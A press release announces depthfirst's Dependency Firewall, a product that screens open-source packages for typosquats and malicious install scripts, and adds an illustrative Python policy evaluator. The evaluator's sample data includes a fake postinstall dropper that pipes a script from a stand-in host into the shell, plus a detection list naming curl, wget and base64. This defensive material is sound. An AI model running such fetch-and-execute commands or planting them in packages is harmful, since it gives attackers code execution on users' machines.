depthfirst today introduced Dependency Firewall, a product that reviews every open-source package being downloaded anywhere in a company and blocks the malicious ones before they reach the person or system that requested them. Developers, AI agents, and any employee using Claude, Codex, or other AI tools keep installing exactly as they do today, and nothing dangerous makes it through. Security teams can ensure that AI is rolled out safely across the company.
Modern software runs on open source, and attackers exploit that trust by publishing packages that mimic popular libraries (typosquats and look-alike names) and hide malicious code inside install scripts, for example npm lifecycle hooks such as preinstall and postinstall, or the setup.py that runs when a Python source distribution is installed. The breach can happen on a first install, even before production: such scripts execute the moment a package is pulled down, so a single developer machine or coding agent installing a malicious dependency can leak credentials, plant a backdoor, or exfiltrate source code before anything has been reviewed, built, or deployed.
Verizon reported that 48% of the data breaches analyzed in its 2026 DBIR involved ransomware, and malware attacks have surged in recent months. They cost almost nothing to launch, and the people pulling in dependencies now include business users running AI assistants and autonomous coding agents, not only security-conscious engineers.
Dependency Firewall inspects every package being downloaded in a company, regardless of who is installing it, and returns a verdict before it is installed. Approved packages pass through with negligible latency, packages that warrant review are quarantined, and anything malicious is blocked with the supporting evidence attached. Engineers use the same install commands, CI pipelines run unchanged, and AI agents keep operating normally.
Because Dependency Firewall analyzes packages the moment they are published rather than at install time, every package has already been assessed by the time anyone requests it. The analysis runs on depthfirst’s agentic defense platform, the same system that discovered NGINX Rift, a critical 18-year-old vulnerability affecting a significant portion of global web traffic. For every new package version, it:
- Runs proprietary analysis on code and install scripts
- Performs runtime analysis to detect malicious package behavior
- Reasons about package intent and investigates unknown behavior
- Flags publisher and maintainer anomalies
- Maps dependency and transitive risk
- Checks against public and private threat and data feeds
Every verdict ships with the evidence behind it, so any decision can be audited back to the underlying signals. Beyond blocking what is clearly malicious, Dependency Firewall gives teams a programmable enforcement layer: requiring a minimum package age, restricting acceptable dependency trees, enforcing license policies across direct and transitive dependencies, and quarantining packages pending manual review. Verdicts route into the tools teams already use, and when the firewall calls something wrong, a team can override the decision in seconds, with every override logged automatically.
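To make the install-script risk and the policy rules above concrete, here is an added example of a small policy evaluator; it is illustrative code written for this page, not depthfirst's product or its API. It walks a requested package and its transitive dependencies, checks a threat-feed blocklist, a minimum package age, a license allowlist, and npm-style lifecycle install scripts, and returns a verdict (allow, quarantine, or block) together with the evidence that produced it. The package names, publish dates, registry dictionary, Policy class and the dropper-marker heuristic are all constructed assumptions; a real gate would read this metadata from the registry at request time.

```python
"""Toy dependency-policy evaluator (added example, not depthfirst's code).

Returns (verdict, evidence) for a requested package and its transitive
dependency tree. All package metadata below is constructed for the example.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

# npm lifecycle hooks that execute code on the installing machine.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Crude dropper indicators in an install script (assumption: illustrative only).
DROPPER_MARKERS = ("curl", "wget", "http://", "https://", "base64", "eval(")
SEVERITY = {"allow": 0, "quarantine": 1, "block": 2}


@dataclass
class Package:
    name: str
    version: str
    published: datetime
    license: str
    scripts: dict = field(default_factory=dict)   # hook name -> shell command
    deps: list = field(default_factory=list)      # names of direct dependencies


@dataclass(frozen=True)
class Policy:
    min_age: timedelta = timedelta(days=3)
    allowed_licenses: frozenset = frozenset({"MIT", "ISC", "Apache-2.0", "BSD-3-Clause"})
    blocklist: frozenset = frozenset()            # names from a threat feed


def transitive_closure(root, registry):
    """Return the root and every reachable dependency once (cycle-safe).

    A dependency missing from the registry is returned as its bare name so the
    caller can report an unresolved dependency instead of silently skipping it.
    """
    seen, order, stack = set(), [], [root]
    while stack:
        name = stack.pop()
        if name in seen:
            continue
        seen.add(name)
        pkg = registry.get(name)
        if pkg is None:
            order.append(name)
            continue
        order.append(pkg)
        stack.extend(pkg.deps)
    return order


def evaluate(root, registry, policy, now):
    """Verdict is the worst finding across the whole tree; evidence lists each finding."""
    verdict, evidence = "allow", []

    def raise_to(level, reason):
        nonlocal verdict
        evidence.append(reason)
        if SEVERITY[level] > SEVERITY[verdict]:
            verdict = level

    for item in transitive_closure(root, registry):
        if isinstance(item, str):
            raise_to("quarantine", f"{item}: not found in registry (unresolved dependency)")
            continue
        pkg, tag = item, f"{item.name}@{item.version}"
        if pkg.name in policy.blocklist:
            raise_to("block", f"{tag}: listed in threat feed")
        age = now - pkg.published
        if age < policy.min_age:
            raise_to("quarantine", f"{tag}: published {age.total_seconds() / 3600:.0f}h ago, below minimum age")
        if pkg.license not in policy.allowed_licenses:
            raise_to("quarantine", f"{tag}: license {pkg.license} not in allowed set")
        for hook, cmd in pkg.scripts.items():
            if hook not in LIFECYCLE_HOOKS:
                continue  # e.g. "test" or "build" scripts never run on install
            if any(m in cmd for m in DROPPER_MARKERS):
                raise_to("block", f"{tag}: {hook} script fetches or decodes remote code: {cmd!r}")
            else:
                raise_to("quarantine", f"{tag}: runs a {hook} script on install: {cmd!r}")
    return verdict, evidence


# Constructed sample registry: a clean library, a one-day-old typosquat with a
# postinstall dropper, a GPL dependency two levels down, and an unresolved dependency.
NOW = datetime(2026, 6, 1, tzinfo=timezone.utc)
REGISTRY = {p.name: p for p in [
    Package("left-utils", "1.2.0", NOW - timedelta(days=400), "MIT", deps=["tiny-dep"]),
    Package("tiny-dep", "0.1.0", NOW - timedelta(days=400), "ISC"),
    Package("left-utils-pro", "1.0.0", NOW - timedelta(days=1), "MIT",
            scripts={"postinstall": "curl -s https://example.invalid/i.sh | sh"}),
    Package("report-gen", "2.0.0", NOW - timedelta(days=90), "MIT", deps=["gpl-lib", "left-utils"]),
    Package("gpl-lib", "3.1.0", NOW - timedelta(days=800), "GPL-3.0"),
    Package("orphan-app", "0.0.1", NOW - timedelta(days=30), "MIT", deps=["does-not-exist"]),
]}
POLICY = Policy()

if __name__ == "__main__":
    for name in ("left-utils", "left-utils-pro", "report-gen", "orphan-app"):
        verdict, evidence = evaluate(name, REGISTRY, POLICY, NOW)
        print(f"{name}: {verdict}")
        for line in evidence:
            print("   ", line)
```

Two design points matter for a real gate. The verdict is the worst finding anywhere in the tree, so a permissive license or a fresh publish on a transitive dependency affects the top-level request, which is what "across direct and transitive dependencies" requires. And every escalation appends a human-readable reason, so an override reviewer can see exactly which signal fired rather than only the final answer.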
“We recently had an incident where an internal vibecoded app inadvertently pulled in a malicious package that put our company at risk. depthfirst’s Dependency Firewall is a game changer as it enables us to safely leverage AI across the company,” said a CISO at a Fortune 100 company.
Dependency Firewall underscores depthfirst’s vision for autonomous security from design to production. As developers, CI systems, and AI-powered workflows bring open-source software into organizations, security must begin at the moment code is introduced and continue across the full software lifecycle.
Dependency Firewall works with the infrastructure companies already have and can be deployed today. To request a demo, visit depthfirst.com.
depthfirst is dedicated to securing open source software. Through the Open Defense Initiative, it offers up to $5 million in depthfirst credits to maintainers of critical open-source projects, so they can find and fix real vulnerabilities before attackers can exploit them. The company is releasing Dependency Firewall to the participants of the Open Defense Initiative to help them prevent malware attacks.
About depthfirst
depthfirst is an applied AI lab on a mission to secure the world’s software by automating security from design to production for businesses facing modern, AI-era threats. The company’s AI-native security platform builds context on a company’s code, infrastructure, and business logic to find complex vulnerabilities, focus on the important issues, and provide developers with ready-to-merge fixes. depthfirst has raised $120M from investors including Meritech Capital, Accel, Forerunner Ventures, BoxGroup, Mantis VC, Liquid 2 Ventures, Alt Capital, SV Angel, and The House Fund. To learn more, visit depthfirst.com.
View source version on businesswire.com: https://www.businesswire.com/news/home/20260601604577/en/